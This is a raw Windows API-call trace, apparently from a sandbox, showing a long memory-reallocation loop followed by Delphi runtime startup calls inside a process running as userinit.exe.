[0177.841] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.842] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.842] GlobalUnlock (hMem=0x14000c) returned 0
[0177.842] GlobalReAlloc (hMem=0x14000c, dwBytes=0x62000, uFlags=0x2) returned 0x14000c
[0177.842] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.842] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.842] GlobalUnlock (hMem=0x14000c) returned 0
[0177.842] GlobalReAlloc (hMem=0x14000c, dwBytes=0x64000, uFlags=0x2) returned 0x14000c
[0177.842] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.843] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.843] GlobalUnlock (hMem=0x14000c) returned 0
[0177.843] GlobalReAlloc (hMem=0x14000c, dwBytes=0x66000, uFlags=0x2) returned 0x14000c
[0177.843] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.844] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.844] GlobalUnlock (hMem=0x14000c) returned 0
[0177.844] GlobalReAlloc (hMem=0x14000c, dwBytes=0x68000, uFlags=0x2) returned 0x14000c
[0177.844] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.845] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.845] GlobalUnlock (hMem=0x14000c) returned 0
[0177.845] GlobalReAlloc (hMem=0x14000c, dwBytes=0x6a000, uFlags=0x2) returned 0x14000c
[0177.845] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.845] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.845] GlobalUnlock (hMem=0x14000c) returned 0
[0177.845] GlobalReAlloc (hMem=0x14000c, dwBytes=0x6c000, uFlags=0x2) returned 0x14000c
[0177.850] GlobalLock (hMem=0x14000c) returned 0x970820
[0177.851] GlobalHandle (pMem=0x970820) returned 0x14000c
[0177.851] GlobalUnlock (hMem=0x14000c) returned 0
[0177.851] GlobalReAlloc (hMem=0x14000c, dwBytes=0x6e000, uFlags=0x2) returned 0x14000c
[0177.851] GlobalLock (hMem=0x14000c) returned 0x970820
[0177.852] GlobalHandle (pMem=0x970820) returned 0x14000c
[0177.852] GlobalUnlock (hMem=0x14000c) returned 0
[0177.852] GlobalReAlloc (hMem=0x14000c, dwBytes=0x70000, uFlags=0x2) returned 0x14000c
[0177.863] GlobalLock (hMem=0x14000c) returned 0x2430048
[0177.863] GlobalHandle (pMem=0x2430048) returned 0x14000c
[0177.863] GlobalUnlock (hMem=0x14000c) returned 0
[0177.863] GlobalReAlloc (hMem=0x14000c, dwBytes=0x72000, uFlags=0x2) returned 0x14000c
[0177.868] GlobalLock (hMem=0x14000c) returned 0x24a0058
[0177.868] GlobalHandle (pMem=0x24a0058) returned 0x14000c
[0177.868] GlobalUnlock (hMem=0x14000c) returned 0
[0177.868] GlobalReAlloc (hMem=0x14000c, dwBytes=0x74000, uFlags=0x2) returned 0x14000c
[0177.868] GlobalLock (hMem=0x14000c) returned 0x24a0058
[0177.869] GlobalHandle (pMem=0x24a0058) returned 0x14000c
[0177.869] GlobalUnlock (hMem=0x14000c) returned 0
[0177.869] GlobalReAlloc (hMem=0x14000c, dwBytes=0x76000, uFlags=0x2) returned 0x14000c
[0177.881] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.882] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.882] GlobalUnlock (hMem=0x14000c) returned 0
[0177.882] GlobalReAlloc (hMem=0x14000c, dwBytes=0x78000, uFlags=0x2) returned 0x14000c
[0177.886] GlobalLock (hMem=0x14000c) returned 0x2430048
[0177.887] GlobalHandle (pMem=0x2430048) returned 0x14000c
[0177.887] GlobalUnlock (hMem=0x14000c) returned 0
[0177.887] GlobalReAlloc (hMem=0x14000c, dwBytes=0x7a000, uFlags=0x2) returned 0x14000c
[0177.891] GlobalLock (hMem=0x14000c) returned 0x24a8058
[0177.892] GlobalHandle (pMem=0x24a8058) returned 0x14000c
[0177.892] GlobalUnlock (hMem=0x14000c) returned 0
[0177.892] GlobalReAlloc (hMem=0x14000c, dwBytes=0x7c000, uFlags=0x2) returned 0x14000c
[0177.892] GlobalLock (hMem=0x14000c) returned 0x24a8058
[0177.893] GlobalHandle (pMem=0x24a8058) returned 0x14000c
[0177.893] GlobalUnlock (hMem=0x14000c) returned 0
[0177.893] GlobalReAlloc (hMem=0x14000c, dwBytes=0x7e000, uFlags=0x2) returned 0x14000c
[0177.906] GlobalLock (hMem=0x14000c) returned 0x2530048
[0177.906] GlobalHandle (pMem=0x2530048) returned 0x14000c
[0177.906] GlobalUnlock (hMem=0x14000c) returned 0
[0177.906] GlobalReAlloc (hMem=0x14000c, dwBytes=0x80000, uFlags=0x2) returned 0x14000c
[0177.921] GlobalLock (hMem=0x14000c) returned 0x640020
[0177.922] GlobalHandle (pMem=0x640020) returned 0x14000c
[0177.922] GlobalUnlock (hMem=0x14000c) returned 0
[0177.922] GlobalReAlloc (hMem=0x14000c, dwBytes=0x82000, uFlags=0x2) returned 0x14000c
[0177.931] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0177.932] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0177.932] GlobalUnlock (hMem=0x14000c) returned 0
[0177.932] GlobalReAlloc (hMem=0x14000c, dwBytes=0x84000, uFlags=0x2) returned 0x14000c
[0177.941] GlobalLock (hMem=0x14000c) returned 0x640020
[0177.942] GlobalHandle (pMem=0x640020) returned 0x14000c
[0177.942] GlobalUnlock (hMem=0x14000c) returned 0
[0177.942] GlobalReAlloc (hMem=0x14000c, dwBytes=0x86000, uFlags=0x2) returned 0x14000c
[0177.952] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0177.952] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0177.952] GlobalUnlock (hMem=0x14000c) returned 0
[0177.952] GlobalReAlloc (hMem=0x14000c, dwBytes=0x88000, uFlags=0x2) returned 0x14000c
[0177.962] GlobalLock (hMem=0x14000c) returned 0x640020
[0177.963] GlobalHandle (pMem=0x640020) returned 0x14000c
[0177.963] GlobalUnlock (hMem=0x14000c) returned 0
[0177.963] GlobalReAlloc (hMem=0x14000c, dwBytes=0x8a000, uFlags=0x2) returned 0x14000c
[0177.972] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0177.973] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0177.973] GlobalUnlock (hMem=0x14000c) returned 0
[0177.973] GlobalReAlloc (hMem=0x14000c, dwBytes=0x8c000, uFlags=0x2) returned 0x14000c
[0177.982] GlobalLock (hMem=0x14000c) returned 0x640020
[0177.983] GlobalHandle (pMem=0x640020) returned 0x14000c
[0177.983] GlobalUnlock (hMem=0x14000c) returned 0
[0177.983] GlobalReAlloc (hMem=0x14000c, dwBytes=0x8e000, uFlags=0x2) returned 0x14000c
[0178.001] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.001] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.001] GlobalUnlock (hMem=0x14000c) returned 0
[0178.001] GlobalReAlloc (hMem=0x14000c, dwBytes=0x90000, uFlags=0x2) returned 0x14000c
[0178.011] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.012] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.012] GlobalUnlock (hMem=0x14000c) returned 0
[0178.012] GlobalReAlloc (hMem=0x14000c, dwBytes=0x92000, uFlags=0x2) returned 0x14000c
[0178.023] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.024] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.024] GlobalUnlock (hMem=0x14000c) returned 0
[0178.024] GlobalReAlloc (hMem=0x14000c, dwBytes=0x94000, uFlags=0x2) returned 0x14000c
[0178.034] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.035] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.035] GlobalUnlock (hMem=0x14000c) returned 0
[0178.035] GlobalReAlloc (hMem=0x14000c, dwBytes=0x96000, uFlags=0x2) returned 0x14000c
[0178.045] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.046] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.046] GlobalUnlock (hMem=0x14000c) returned 0
[0178.046] GlobalReAlloc (hMem=0x14000c, dwBytes=0x98000, uFlags=0x2) returned 0x14000c
[0178.057] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.058] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.058] GlobalUnlock (hMem=0x14000c) returned 0
[0178.058] GlobalReAlloc (hMem=0x14000c, dwBytes=0x9a000, uFlags=0x2) returned 0x14000c
[0178.070] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.070] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.071] GlobalUnlock (hMem=0x14000c) returned 0
[0178.071] GlobalReAlloc (hMem=0x14000c, dwBytes=0x9c000, uFlags=0x2) returned 0x14000c
[0178.080] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.081] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.081] GlobalUnlock (hMem=0x14000c) returned 0
[0178.081] GlobalReAlloc (hMem=0x14000c, dwBytes=0x9e000, uFlags=0x2) returned 0x14000c
[0178.091] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.092] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.092] GlobalUnlock (hMem=0x14000c) returned 0
[0178.092] GlobalReAlloc (hMem=0x14000c, dwBytes=0xa0000, uFlags=0x2) returned 0x14000c
[0178.102] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.103] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.103] GlobalUnlock (hMem=0x14000c) returned 0
[0178.103] GlobalReAlloc (hMem=0x14000c, dwBytes=0xa2000, uFlags=0x2) returned 0x14000c
[0178.113] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.114] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.114] GlobalUnlock (hMem=0x14000c) returned 0
[0178.114] GlobalReAlloc (hMem=0x14000c, dwBytes=0xa4000, uFlags=0x2) returned 0x14000c
[0178.125] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.126] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.126] GlobalUnlock (hMem=0x14000c) returned 0
[0178.126] GlobalReAlloc (hMem=0x14000c, dwBytes=0xa6000, uFlags=0x2) returned 0x14000c
[0178.136] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.137] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.137] GlobalUnlock (hMem=0x14000c) returned 0
[0178.137] GlobalReAlloc (hMem=0x14000c, dwBytes=0xa8000, uFlags=0x2) returned 0x14000c
[0178.148] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.149] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.149] GlobalUnlock (hMem=0x14000c) returned 0
[0178.149] GlobalReAlloc (hMem=0x14000c, dwBytes=0xaa000, uFlags=0x2) returned 0x14000c
[0178.160] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.161] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.161] GlobalUnlock (hMem=0x14000c) returned 0
[0178.161] GlobalReAlloc (hMem=0x14000c, dwBytes=0xac000, uFlags=0x2) returned 0x14000c
[0178.172] GlobalLock (hMem=0x14000c) returned 0x640020
[0178.173] GlobalHandle (pMem=0x640020) returned 0x14000c
[0178.173] GlobalUnlock (hMem=0x14000c) returned 0
[0178.173] GlobalReAlloc (hMem=0x14000c, dwBytes=0xae000, uFlags=0x2) returned 0x14000c
[0178.185] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.185] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.185] GlobalUnlock (hMem=0x14000c) returned 0
[0178.185] GlobalReAlloc (hMem=0x14000c, dwBytes=0xb0000, uFlags=0x2) returned 0x14000c
[0178.197] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.198] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.198] GlobalUnlock (hMem=0x14000c) returned 0
[0178.198] GlobalReAlloc (hMem=0x14000c, dwBytes=0xb2000, uFlags=0x2) returned 0x14000c
[0178.210] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.211] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.211] GlobalUnlock (hMem=0x14000c) returned 0
[0178.211] GlobalReAlloc (hMem=0x14000c, dwBytes=0xb4000, uFlags=0x2) returned 0x14000c
[0178.223] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.271] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.271] GlobalUnlock (hMem=0x14000c) returned 0
[0178.271] GlobalReAlloc (hMem=0x14000c, dwBytes=0xb6000, uFlags=0x2) returned 0x14000c
[0178.282] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.283] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.283] GlobalUnlock (hMem=0x14000c) returned 0
[0178.283] GlobalReAlloc (hMem=0x14000c, dwBytes=0xb8000, uFlags=0x2) returned 0x14000c
[0178.295] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.296] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.296] GlobalUnlock (hMem=0x14000c) returned 0
[0178.296] GlobalReAlloc (hMem=0x14000c, dwBytes=0xba000, uFlags=0x2) returned 0x14000c
[0178.309] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.310] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.310] GlobalUnlock (hMem=0x14000c) returned 0
[0178.310] GlobalReAlloc (hMem=0x14000c, dwBytes=0xbc000, uFlags=0x2) returned 0x14000c
[0178.327] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.328] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.328] GlobalUnlock (hMem=0x14000c) returned 0
[0178.328] GlobalReAlloc (hMem=0x14000c, dwBytes=0xbe000, uFlags=0x2) returned 0x14000c
[0178.341] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.341] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.341] GlobalUnlock (hMem=0x14000c) returned 0
[0178.341] GlobalReAlloc (hMem=0x14000c, dwBytes=0xc0000, uFlags=0x2) returned 0x14000c
[0178.354] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.354] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.354] GlobalUnlock (hMem=0x14000c) returned 0
[0178.354] GlobalReAlloc (hMem=0x14000c, dwBytes=0xc2000, uFlags=0x2) returned 0x14000c
[0178.418] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.418] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.418] GlobalUnlock (hMem=0x14000c) returned 0
[0178.418] GlobalReAlloc (hMem=0x14000c, dwBytes=0xc4000, uFlags=0x2) returned 0x14000c
[0178.431] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.432] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.432] GlobalUnlock (hMem=0x14000c) returned 0
[0178.432] GlobalReAlloc (hMem=0x14000c, dwBytes=0xc6000, uFlags=0x2) returned 0x14000c
[0178.445] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.446] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.446] GlobalUnlock (hMem=0x14000c) returned 0
[0178.446] GlobalReAlloc (hMem=0x14000c, dwBytes=0xc8000, uFlags=0x2) returned 0x14000c
[0178.458] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.459] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.459] GlobalUnlock (hMem=0x14000c) returned 0
[0178.459] GlobalReAlloc (hMem=0x14000c, dwBytes=0xca000, uFlags=0x2) returned 0x14000c
[0178.472] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.473] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.473] GlobalUnlock (hMem=0x14000c) returned 0
[0178.473] GlobalReAlloc (hMem=0x14000c, dwBytes=0xcc000, uFlags=0x2) returned 0x14000c
[0178.486] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.486] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.486] GlobalUnlock (hMem=0x14000c) returned 0
[0178.486] GlobalReAlloc (hMem=0x14000c, dwBytes=0xce000, uFlags=0x2) returned 0x14000c
[0178.499] GlobalLock (hMem=0x14000c) returned 0x7e0020
[0178.500] GlobalHandle (pMem=0x7e0020) returned 0x14000c
[0178.500] GlobalUnlock (hMem=0x14000c) returned 0
[0178.500] GlobalReAlloc (hMem=0x14000c, dwBytes=0xd0000, uFlags=0x2) returned 0x14000c
[0178.531] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.532] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.532] GlobalUnlock (hMem=0x14000c) returned 0
[0178.532] GlobalReAlloc (hMem=0x14000c, dwBytes=0xd2000, uFlags=0x2) returned 0x14000c
[0178.545] GlobalLock (hMem=0x14000c) returned 0x2810020
[0178.546] GlobalHandle (pMem=0x2810020) returned 0x14000c
[0178.546] GlobalUnlock (hMem=0x14000c) returned 0
[0178.546] GlobalReAlloc (hMem=0x14000c, dwBytes=0xd4000, uFlags=0x2) returned 0x14000c
[0178.560] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.561] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.561] GlobalUnlock (hMem=0x14000c) returned 0
[0178.561] GlobalReAlloc (hMem=0x14000c, dwBytes=0xd6000, uFlags=0x2) returned 0x14000c
[0178.622] GlobalLock (hMem=0x14000c) returned 0x2810020
[0178.623] GlobalHandle (pMem=0x2810020) returned 0x14000c
[0178.623] GlobalUnlock (hMem=0x14000c) returned 0
[0178.623] GlobalReAlloc (hMem=0x14000c, dwBytes=0xd8000, uFlags=0x2) returned 0x14000c
[0178.637] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.638] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.638] GlobalUnlock (hMem=0x14000c) returned 0
[0178.638] GlobalReAlloc (hMem=0x14000c, dwBytes=0xda000, uFlags=0x2) returned 0x14000c
[0178.652] GlobalLock (hMem=0x14000c) returned 0x2810020
[0178.652] GlobalHandle (pMem=0x2810020) returned 0x14000c
[0178.652] GlobalUnlock (hMem=0x14000c) returned 0
[0178.652] GlobalReAlloc (hMem=0x14000c, dwBytes=0xdc000, uFlags=0x2) returned 0x14000c
[0178.720] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.721] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.721] GlobalUnlock (hMem=0x14000c) returned 0
[0178.721] GlobalReAlloc (hMem=0x14000c, dwBytes=0xde000, uFlags=0x2) returned 0x14000c
[0178.735] GlobalLock (hMem=0x14000c) returned 0x2810020
[0178.736] GlobalHandle (pMem=0x2810020) returned 0x14000c
[0178.736] GlobalUnlock (hMem=0x14000c) returned 0
[0178.736] GlobalReAlloc (hMem=0x14000c, dwBytes=0xe0000, uFlags=0x2) returned 0x14000c
[0178.751] GlobalLock (hMem=0x14000c) returned 0x28f0020
[0178.752] GlobalHandle (pMem=0x28f0020) returned 0x14000c
[0178.752] GlobalUnlock (hMem=0x14000c) returned 0
[0178.752] GlobalReAlloc (hMem=0x14000c, dwBytes=0xe2000, uFlags=0x2) returned 0x14000c
[0178.813] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.814] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.814] GlobalUnlock (hMem=0x14000c) returned 0
[0178.814] GlobalReAlloc (hMem=0x14000c, dwBytes=0xe4000, uFlags=0x2) returned 0x14000c
[0178.829] GlobalLock (hMem=0x14000c) returned 0x2820020
[0178.830] GlobalHandle (pMem=0x2820020) returned 0x14000c
[0178.830] GlobalUnlock (hMem=0x14000c) returned 0
[0178.830] GlobalReAlloc (hMem=0x14000c, dwBytes=0xe6000, uFlags=0x2) returned 0x14000c
[0178.845] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.845] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.845] GlobalUnlock (hMem=0x14000c) returned 0
[0178.846] GlobalReAlloc (hMem=0x14000c, dwBytes=0xe8000, uFlags=0x2) returned 0x14000c
[0178.907] GlobalLock (hMem=0x14000c) returned 0x2820020
[0178.908] GlobalHandle (pMem=0x2820020) returned 0x14000c
[0178.908] GlobalUnlock (hMem=0x14000c) returned 0
[0178.908] GlobalReAlloc (hMem=0x14000c, dwBytes=0xea000, uFlags=0x2) returned 0x14000c
[0178.923] GlobalLock (hMem=0x14000c) returned 0x2730020
[0178.923] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0178.924] GlobalUnlock (hMem=0x14000c) returned 0
[0178.924] GlobalReAlloc (hMem=0x14000c, dwBytes=0xec000, uFlags=0x2) returned 0x14000c
[0178.938] GlobalLock (hMem=0x14000c) returned 0x2820020
[0178.939] GlobalHandle (pMem=0x2820020) returned 0x14000c
[0178.939] GlobalUnlock (hMem=0x14000c) returned 0
[0178.939] GlobalReAlloc (hMem=0x14000c, dwBytes=0xee000, uFlags=0x2) returned 0x14000c
[0179.016] GlobalLock (hMem=0x14000c) returned 0x2730020
[0179.017] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0179.017] GlobalUnlock (hMem=0x14000c) returned 0
[0179.017] GlobalReAlloc (hMem=0x14000c, dwBytes=0xf0000, uFlags=0x2) returned 0x14000c
[0179.083] GlobalLock (hMem=0x14000c) returned 0x2820020
[0179.084] GlobalHandle (pMem=0x2820020) returned 0x14000c
[0179.084] GlobalUnlock (hMem=0x14000c) returned 0
[0179.084] GlobalReAlloc (hMem=0x14000c, dwBytes=0xf2000, uFlags=0x2) returned 0x14000c
[0179.100] GlobalLock (hMem=0x14000c) returned 0x2920020
[0179.101] GlobalHandle (pMem=0x2920020) returned 0x14000c
[0179.101] GlobalUnlock (hMem=0x14000c) returned 0
[0179.101] GlobalReAlloc (hMem=0x14000c, dwBytes=0xf4000, uFlags=0x2) returned 0x14000c
[0179.163] GlobalLock (hMem=0x14000c) returned 0x2730020
[0179.164] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0179.164] GlobalUnlock (hMem=0x14000c) returned 0
[0179.164] GlobalReAlloc (hMem=0x14000c, dwBytes=0xf6000, uFlags=0x2) returned 0x14000c
[0179.180] GlobalLock (hMem=0x14000c) returned 0x2830020
[0179.181] GlobalHandle (pMem=0x2830020) returned 0x14000c
[0179.181] GlobalUnlock (hMem=0x14000c) returned 0
[0179.181] GlobalReAlloc (hMem=0x14000c, dwBytes=0xf8000, uFlags=0x2) returned 0x14000c
[0179.197] GlobalLock (hMem=0x14000c) returned 0x2730020
[0179.198] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0179.198] GlobalUnlock (hMem=0x14000c) returned 0
[0179.198] GlobalReAlloc (hMem=0x14000c, dwBytes=0xfa000, uFlags=0x2) returned 0x14000c
[0179.261] GlobalLock (hMem=0x14000c) returned 0x2830020
[0179.261] GlobalHandle (pMem=0x2830020) returned 0x14000c
[0179.261] GlobalUnlock (hMem=0x14000c) returned 0
[0179.261] GlobalReAlloc (hMem=0x14000c, dwBytes=0xfc000, uFlags=0x2) returned 0x14000c
[0179.278] GlobalLock (hMem=0x14000c) returned 0x2730020
[0179.278] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0179.279] GlobalUnlock (hMem=0x14000c) returned 0
[0179.279] GlobalReAlloc (hMem=0x14000c, dwBytes=0xfe000, uFlags=0x2) returned 0x14000c
[0179.295] GlobalLock (hMem=0x14000c) returned 0x2830020
[0179.296] GlobalHandle (pMem=0x2830020) returned 0x14000c
[0179.296] GlobalUnlock (hMem=0x14000c) returned 0
[0179.296] GlobalReAlloc (hMem=0x14000c, dwBytes=0x100000, uFlags=0x2) returned 0x14000c
[0179.360] GlobalLock (hMem=0x14000c) returned 0x2930020
[0179.361] GlobalHandle (pMem=0x2930020) returned 0x14000c
[0179.361] GlobalUnlock (hMem=0x14000c) returned 0
[0179.361] GlobalReAlloc (hMem=0x14000c, dwBytes=0x102000, uFlags=0x2) returned 0x14000c
[0179.378] GlobalLock (hMem=0x14000c) returned 0x2730020
[0179.379] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0179.379] GlobalUnlock (hMem=0x14000c) returned 0
[0179.379] GlobalReAlloc (hMem=0x14000c, dwBytes=0x104000, uFlags=0x2) returned 0x14000c
[0179.442] GlobalLock (hMem=0x14000c) returned 0x2840020
[0179.443] GlobalHandle (pMem=0x2840020) returned 0x14000c
[0179.443] GlobalUnlock (hMem=0x14000c) returned 0
[0179.443] GlobalReAlloc (hMem=0x14000c, dwBytes=0x106000, uFlags=0x2) returned 0x14000c
[0179.460] GlobalLock (hMem=0x14000c) returned 0x2730020
[0179.461] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0179.461] GlobalUnlock (hMem=0x14000c) returned 0
[0179.461] GlobalReAlloc (hMem=0x14000c, dwBytes=0x108000, uFlags=0x2) returned 0x14000c
[0179.478] GlobalLock (hMem=0x14000c) returned 0x2840020
[0179.479] GlobalHandle (pMem=0x2840020) returned 0x14000c
[0179.479] GlobalUnlock (hMem=0x14000c) returned 0
[0179.479] GlobalReAlloc (hMem=0x14000c, dwBytes=0x10a000, uFlags=0x2) returned 0x14000c
[0179.544] GlobalLock (hMem=0x14000c) returned 0x2730020
[0179.545] GlobalHandle (pMem=0x2730020) returned 0x14000c
[0179.545] GlobalUnlock (hMem=0x14000c) returned 0
[0179.545] GlobalReAlloc (hMem=0x14000c, dwBytes=0x10c000, uFlags=0x2) returned 0x14000c
[0179.563] GlobalLock (hMem=0x14000c) returned 0x2840020
[0179.563] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2730000
[0179.564] VirtualAlloc (lpAddress=0x2730000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2730000
[0179.645] GetKeyboardType (nTypeFlag=0) returned 4
[0179.646] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0179.646] GetStartupInfoA (in: lpStartupInfo=0x20f550 | out: lpStartupInfo=0x20f550*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0179.646] GetVersion () returned 0x1db10106
[0179.646] GetVersion () returned 0x1db10106
[0179.646] GetCurrentThreadId () returned 0x3d8
[0179.646] GetModuleFileNameA (in: hModule=0x2950000, lpFilename=0x20f04c, nSize=0x105 | out: lpFilename="\\ð " (normalized: "c:\\ð ")) returned 0x0
[0179.646] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20ef27, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.646] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x20f03c | out: phkResult=0x20f03c*=0x0) returned 0x2
[0179.646] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x20f03c | out: phkResult=0x20f03c*=0x0) returned 0x2
[0179.646] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x20f03c | out: phkResult=0x20f03c*=0x0) returned 0x2
[0179.646] lstrcpynA (in: lpString1=0x20ef27, lpString2="\\ð ", iMaxLength=261 | out: lpString1="\\ð ") returned="\\ð "
[0179.646] GetThreadLocale () returned 0x409
[0179.646] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x20f037, cchData=5 | out: lpLCData="ENU") returned 4
[0179.646] lstrlenA (lpString="\\ð ") returned 3
[0179.646] LoadStringA (in: hInstance=0x2950000, uID=0xffc4, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0179.646] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x90dcc0
[0179.646] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a70000
[0179.646] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x90ecc0
[0179.646] VirtualAlloc (lpAddress=0x2a70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a70000
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffc3, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffc1, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffc2, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffd4, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffdd, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
